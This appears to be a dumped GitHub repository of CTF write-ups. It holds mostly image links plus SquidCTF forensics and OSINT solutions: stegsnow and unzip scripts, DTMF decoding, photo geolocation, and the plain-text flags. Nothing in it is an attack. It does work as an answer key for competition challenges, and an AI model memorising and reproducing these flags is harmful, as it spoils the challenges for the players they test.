https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  0.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  1.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  2.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  3.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  4.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  5.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  6.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  7.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  8.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/  9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/  9.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 10.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 11.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 12.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 13.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 14.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 15.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 16.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 17.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 18.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 19.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 20.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 21.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 22.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 23.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 24.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 24.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 25.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 26.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 27.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 28.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 29.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 30.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 31.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 32.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 33.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 33.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 34.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 35.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 35.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 36.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 36.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 37.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 37.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 38.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 38.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 39.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 39.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 40.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 41.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 41.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 42.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 42.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 43.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 44.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 45.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 46.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 46.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 47.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 47.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/que.png


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Steganography
2 | 
3 | ![](Steganography.png)
4 | 


--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Steganography.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Steganography.png


--------------------------------------------------------------------------------
/2022/KnightCTF/scoreboard2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/scoreboard2.png


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Forensics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Forensics.png


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/README.md:
--------------------------------------------------------------------------------
 1 | # Is It or It Isn't
 2 | 
 3 | **Category**: Forensic \
 4 | **Points**: 134
 5 | 
 6 | ## Description
 7 | 
 8 | > Here is the (or is it?) status for your position in the game:
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [txt](status.txt).
14 | 
15 | Just use `stegsnow`.
16 | 
17 | > You can use the [sol.sh](sol.sh) to get the flag.
18 | 
19 | # Flag is `SCTF{YOU_ARE_ELIMINATED}`
20 | 
21 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{YOU_ARE_ELIMINATED}
2 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Is it or it isn’t [134]/que.png


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/sol.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | stegsnow -p frontman -C status.txt | awk '$0="SCTF{"$0"}"' 
3 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/status.txt:
--------------------------------------------------------------------------------
1 |                                      IMPOSE AS THE "frontman" TO KNOW YOUR GAME STATUS:
2 | 	     	   	   	     	   	     	      	 	  
3 |       	     	      	  	       	 	      	 	       	 
4 |      	      	 	 				      	   
5 | 	     		     	    	       	   	       	  	      
6 |       	    	      	   	      	       		  		 
7 |   	    	    	   		
8 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/README.md:
--------------------------------------------------------------------------------
 1 | # It will take too long
 2 | 
 3 | **Category**: Forensic \
 4 | **Points**: 50
 5 | 
 6 | ## Description
 7 | 
 8 | > Time is running out and the answer is behind 100 locked doors:
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [Zipped99.zip](Zipped99.zip).
14 | 
15 | Just use `unzip` 100 times and get the flag.
16 | 
17 | > You can use the [sol.sh](sol.sh) to get the flag.
18 | 
19 | # Flag is `SCTF{TIM3_1S_RUNN1N6}`
20 | 
21 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/Zipped99.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/It will take too long [104]/Zipped99.zip


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{TIM3_1S_RUNN1N6}


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/It will take too long [104]/que.png


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/sol.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | for ((i = 100; i > 0; i--)); do
 3 |     if [ ! -f "Zipped$i.zip" ]; then
 4 |         break
 5 |     fi
 6 |     unzip Zipped$i.zip
 7 |     rm Zipped$i.zip
 8 | done
 9 | clear
10 | cat flag.txt
11 | echo ""
12 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/README.md:
--------------------------------------------------------------------------------
 1 | # Player 001
 2 | 
 3 | **Category**: Forensic \
 4 | **Points**: 30
 5 | 
 6 | ## Description
 7 | 
 8 | > This could be a reason why Player 001 never played the last game: We think he had:
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [confidential.mp3](confidential.mp3).
14 | 
15 | It's a reversed mp3 so, just reverse it and you can hear the flag.
16 | 
17 | After reversing it I got: [confidential_(rev).mp3](confidential_(rev).mp3).
18 | 
19 | > You can use the [mp3cut.net](https://mp3cut.net/reverse-audio) to reverse the mp3.
20 | 
21 | # Flag is `SCTF{squid_allergy}`
22 | 
23 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/confidential.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/confidential.mp3


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/confidential_(rev).mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/confidential_(rev).mp3


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{squid_allergy}
2 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/que.png


--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF | Forensics
2 | 
3 | ![](Forensics.png)
4 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/README.md:
--------------------------------------------------------------------------------
 1 | # Anonymous Call
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 140
 5 | 
 6 | ## Description
 7 | 
 8 | > After the final game , Seung-Gi-Hun gets a call from an anonymous phone no. on his *old phone*. After being hesitant at first he picks up and a strange noise is heard from the other end. At last an old man’s voice is heard saying Find your money. Help seung -gi-hun to get his reward.
 9 | 
10 | ![](que.png)
11 | ## Solution
12 | 
13 | Given file is [hello.wav](hello.wav).
14 | 
15 | using [dtmf-decoder](https://github.com/ribt/dtmf-decoder), I got
16 | ``83678470123674877519584489584824952789553845284494878125``
17 | 
18 | decode it *from decimal to ascii* (https://onlineasciitools.com/convert-decimal-to-ascii)
19 | 
20 | ![](dec-to-ascii.png)
21 | 
22 | # Flag is `SCTF{C0M3_T0_TR14N_5T4T10N}`
23 | 
24 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/dec-to-ascii.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/dec-to-ascii.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{C0M3_T0_TR14N_5T4T10N}
2 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/hello.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/hello.wav


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/que.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/README.md:
--------------------------------------------------------------------------------
 1 | # Belarus
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 20
 5 | 
 6 | ## Description
 7 | 
 8 | > Find the nearest station to the place where this photo was taken:
 9 | 
10 | Flag format:- SCTF{station_name_all_small_without_spaces}
11 | 
12 | ![](que.png)
13 | ## Solution
14 | 
15 | Given file is 
16 | 
17 | ![image.png](image.png).
18 | 
19 | Using reverse image lookup, I got the same image with good quality
20 | ![](image_good_quality.png).
21 | 
22 | By looking closer, I got a name `English National Ballet`.
23 | ![](image_zoom.png)
24 | 
25 | Searched it on google map and got this:
26 | ![](image_map.png)
27 | 
28 | The google map shows that the nearest train station is "Canning Town" which is the flag.
29 | ![](image_station.png)
30 | 
31 | # Flag is `SCTF{canningtown}`
32 |  
33 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{canningtown}
2 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_good_quality.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_good_quality.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_map.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_station.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_station.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_zoom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_zoom.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/que.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/OSINT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/OSINT.png


--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF | OSINT
2 | 
3 | ![](OSINT.png)
4 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF 2022
2 | 
3 | **Site** : https://squidctf2022.cf
4 | 
5 | **Rank** : 1 / 75
6 | 
7 | ![](scoreboard.png)
8 | 


--------------------------------------------------------------------------------
/2022/SquidCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/scoreboard.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Red Knights CTF Writeups :warning:
 2 | 
 3 | | CTF                                               |      Rank |
 4 | |:--------------------------------------------------|----------:|
 5 | | [Hayyim CTF 2022](2022/HayyimCTF/)                |     12/86 |
 6 | | [DefCamp CTF 21-22](2022/DefCampCTF/)             |   18/1035 |
 7 | | [Cyber Grabs CTF 2022](2022/CybergrabsCTF/)       |     3/285 |
 8 | | [Knight CTF 2022](2022/KnightCTF/)                |  18 / 752 |
 9 | | [Squid CTF 2022](2022/SquidCTF/)                  |   1 / 75  |
10 | | [Cybergrab CTF 2021](2021/cybergrab_ctf/)         |   9 / 224 |
11 | | [SunshineCTF 2020](2020/sunshine_ctf/)            |  17 / 742 |
12 | | [Affinity CTF Lite 2020](2020/affinity_ctf_lite/) |   5 / 689 |
13 | | [Dragon CTF 2020](2020/dragon_ctf/)               | 107 / 539 |
14 | | [InterIUT_CTF_2020](2020/InterIUT_ctf/)           |   5 / 87  |
15 | | [Boot2Root_CTF_2020](2020/Boot2root_ctf/)         |   9 / 124 |
16 | | [Asis_CTF_2020](2020/asis_ctf/)                   |  64 / 351 |
17 | | [Vulnfreak_CTF_2020](2020/vulnfreak_ctf/)         |   4 /  81 |
18 | 
19 | 


--------------------------------------------------------------------------------